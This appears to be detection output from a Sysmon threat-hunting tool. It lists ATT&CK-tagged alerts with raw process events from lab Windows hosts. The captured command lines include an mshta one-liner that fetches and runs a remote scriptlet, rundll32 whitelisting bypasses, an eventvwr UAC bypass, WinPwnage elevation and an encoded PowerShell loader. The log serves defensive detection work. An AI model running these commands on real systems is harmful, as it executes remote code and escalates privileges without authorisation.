Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.241 + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6173 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:44.023 + 365ABB72-FE6C-5CEB-0000-0010050C0C00 + 3520 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5976 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.994 + 365ABB72-3D6F-5CEB-0000-001032DBFF00 + 1900 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16245 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.070 + 365ABB72-69A3-5CD7-0000-0010306F2200 + 3752 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16451 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:03.558 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-252D-5CD8-0000-001019E20300 + 2800 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2362770 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-11-26 17:38:11.175 + 00247C92-E803-5FBF-0000-0010F2BFB40C + 16980 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3404-5FBE-0000-0020E0C90600 + 0x6c9e0 + 1 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-E803-5FBF-0000-0010CDB9B40C + 17336 + C:\Windows\System32\taskhostw.exe + taskhostw.exe $(Arg0) 